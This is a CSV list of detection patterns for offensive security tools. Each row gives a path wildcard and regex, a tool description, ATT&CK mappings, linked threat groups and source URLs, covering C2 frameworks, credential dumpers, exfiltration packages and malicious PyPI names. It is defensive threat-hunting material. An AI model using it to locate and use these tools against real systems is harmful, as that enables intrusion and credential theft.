"*/py_oneliner.py*",".{0,1000}\/py_oneliner\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10060"
"*/pyasn1/*",".{0,1000}\/pyasn1\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","10062"
"*/PyClone.py*",".{0,1000}\/PyClone\.py.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","10063"
"*/pycobalt-*",".{0,1000}\/pycobalt\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","10064"
"*/pycobalt/*",".{0,1000}\/pycobalt\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","10065"
"*/PyExec.git*",".{0,1000}\/PyExec\.git.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","N/A","9","1","11","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z","10066"
"*/PyExfil.git*",".{0,1000}\/PyExfil\.git.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","10067"
"*/PyExfil/pyexfil/*",".{0,1000}\/PyExfil\/pyexfil\/.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","10068"
"*/pykiller/CVE-2022-23131*",".{0,1000}\/pykiller\/CVE\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/pykiller/CVE-2022-23131","1","1","N/A","N/A","N/A","1","2","0","2022-02-24T11:59:48Z","2022-02-24T11:34:27Z","10071"
"*/pyLAPS.git*",".{0,1000}\/pyLAPS\.git.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","#linux","N/A","9","2","105","16","2024-10-28T08:36:38Z","2021-10-05T18:35:21Z","10072"
"*/pyLAPS.py*",".{0,1000}\/pyLAPS\.py.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","#linux","N/A","9","2","105","16","2024-10-28T08:36:38Z","2021-10-05T18:35:21Z","10073"
"*/pymetasploit/*",".{0,1000}\/pymetasploit\/.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","#linux","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","10074"
"*/Pyobfadvance*",".{0,1000}\/Pyobfadvance.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10075"
"*/Pyobfexecute*",".{0,1000}\/Pyobfexecute.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10076"
"*/pyobfgood*",".{0,1000}\/pyobfgood.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10077"
"*/Pyobflite*",".{0,1000}\/Pyobflite.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10078"
"*/Pyobfpremium*",".{0,1000}\/Pyobfpremium.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10079"
"*/Pyobftoexe*",".{0,1000}\/Pyobftoexe.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10080"
"*/Pyobfuse*",".{0,1000}\/Pyobfuse.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10081"
"*/Pyobfusfile*",".{0,1000}\/Pyobfusfile.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10082"
"*/pypi.org/project/GraphSpy*",".{0,1000}\/pypi\.org\/project\/GraphSpy.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","1","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","10086"
"*/pypykatz*",".{0,1000}\/pypykatz.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","10087"
"*/pypykatz.py*",".{0,1000}\/pypykatz\.py.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","10088"
"*/Pyramid.git*",".{0,1000}\/Pyramid\.git.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","10089"
"*/pyramid.py*",".{0,1000}\/pyramid\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","10090"
"*/pyrdp.git*",".{0,1000}\/pyrdp\.git.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","10091"
"*/pyrdp.git*",".{0,1000}\/pyrdp\.git.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","10092"
"*/pyrdp:latest*",".{0,1000}\/pyrdp\:latest.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","10093"
"*/pyrdp_mitm-*",".{0,1000}\/pyrdp_mitm\-.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","10094"
"*/pysecdump.git*",".{0,1000}\/pysecdump\.git.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","1","N/A","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","10095"
"*/pysnaffler.git*",".{0,1000}\/pysnaffler\.git.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","1","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","10097"
"*/Pysoserial.git*",".{0,1000}\/Pysoserial\.git.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","10098"
"*/pysoxy.git*",".{0,1000}\/pysoxy\.git.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","1","N/A","N/A","10","10","149","51","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z","10099"
"*/pysoxy.py*",".{0,1000}\/pysoxy\.py.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","1","N/A","N/A","10","10","149","51","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z","10100"
"*/PySQLRecon.git*",".{0,1000}\/PySQLRecon\.git.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","1","N/A","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","10101"
"*/PySQLRecon/tarball*",".{0,1000}\/PySQLRecon\/tarball.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","1","N/A","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","10102"
"*/PySQLRecon/zipball*",".{0,1000}\/PySQLRecon\/zipball.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","1","N/A","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","10103"
"*/pystinger.zip*",".{0,1000}\/pystinger\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","10104"
"*/Python-dynload-os.h*",".{0,1000}\/Python\-dynload\-os\.h.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10105"
"*/pythonmemorymodule.py*",".{0,1000}\/pythonmemorymodule\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#linux","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","10106"
"*/Python-Rootkit.git*",".{0,1000}\/Python\-Rootkit\.git.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","10107"
"*/pywerview*",".{0,1000}\/pywerview.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","N/A","10","974","121","2025-03-17T14:04:51Z","2016-07-06T13:25:09Z","10108"
"*/pywhisker.git*",".{0,1000}\/pywhisker\.git.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","10109"
"*/pywsus.git*",".{0,1000}\/pywsus\.git.{0,1000}","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pywsus","1","1","N/A","network exploitation tool","N/A","4","303","44","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z","10110"
"*/pywsus.py*",".{0,1000}\/pywsus\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","10111"
"*/pywsus-master.zip*",".{0,1000}\/pywsus\-master\.zip.{0,1000}","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pywsus","1","1","N/A","network exploitation tool","N/A","4","303","44","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z","10112"
"*/qakbot.profile*",".{0,1000}\/qakbot\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","10113"
